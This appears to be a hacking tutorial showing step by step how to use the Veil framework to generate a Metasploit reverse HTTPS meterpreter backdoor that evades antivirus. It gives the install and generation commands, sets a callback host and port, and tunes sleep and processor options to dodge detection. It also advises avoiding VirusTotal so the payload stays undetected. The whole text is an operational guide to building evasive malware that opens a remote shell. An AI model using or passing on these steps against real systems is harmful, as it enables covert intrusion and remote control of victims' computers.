Backdoor Payload with Veil
Veil is a tool designed to generate Metasploit payloads that bypass common anti-virus solutions.
Download and install it from here.
Change directory to the folder where you would like to download and install the app:
# cd /opt/
Use git clone <URL of the repository>:
/opt# git clone https://github.com/Veil-Framework/Veil
Change to the “config” folder:
/opt# cd Veil/config/
Run the setup script:
/opt/Veil/config# ./setup.sh --silent --force
The installation will take a few minutes.
This is what you will get when the installation is finished:
When you are ready, let’s run the app:
Change to the Veil folder and run:
# ./Veil.py
Run the update, just to be on the safe side, to make sure that you get the latest database.
Type "list" and you will see the options of Veil:
Start with option 1 – Evasion.
Veil> use 1
Once you are at the Veil/Evasion> prompt, type "list" again to see all the payloads you can use in Veil:
Each payload name is divided into three parts:
Payload programming language
Type of payload
Payload method
For this test you will use number 15, go/meterpreter/rev_https.py.
At the Veil prompt, type:
Veil/Evasion>: use 15
Start by setting LHOST to your IP address (the Kali machine):
[go/meterpreter/rev_https>>]: set LHOST 10.0.2.4
The next stage is to set the port with set LPORT 8080 (or any port you like).
[go/meterpreter/rev_https>>]: set LPORT 8080
Type “options” to see all the options again, including your configuration (the IP and port):
The options window will now show your data:
To bypass the antivirus on the target computer, you will tweak your payload a bit by changing the number of “processors” and the “sleep” time (in seconds):
[go/meterpreter/rev_https>>]: set PROCESSORS 1
[go/meterpreter/rev_https>>]: set SLEEP 6
To check again if all is set, type “options” and hit enter:
[go/meterpreter/rev_https>>]: options
Now, all that is left is to generate the backdoor and give it a name:
[go/meterpreter/rev_https>>]: generate
When the process is finished, you will see all the details of your build:
You can run the “checkvt” command to check your payload, but the best way to check it is to send it to your test machine (your Windows 10 VM).
** Don’t check your payload with VirusTotal! It will register your payload and share it with all antiviruses and your payload will not work anymore **
To check if your new payload can go undetected with all or some antiviruses, go to https://nodistribute.com/ and upload it for a check.
If you see that it has been detected, try to play with the options, the time, the number of processors, and so on.
In addition, do not forget to update Veil every time.
Congratulations! You now have a new backdoor payload!
The next stage is to start listening for the connection from your payload.
All the guides, tips, and tricks on this website are for educational purposes only; the website owner is not accountable for any use of this information.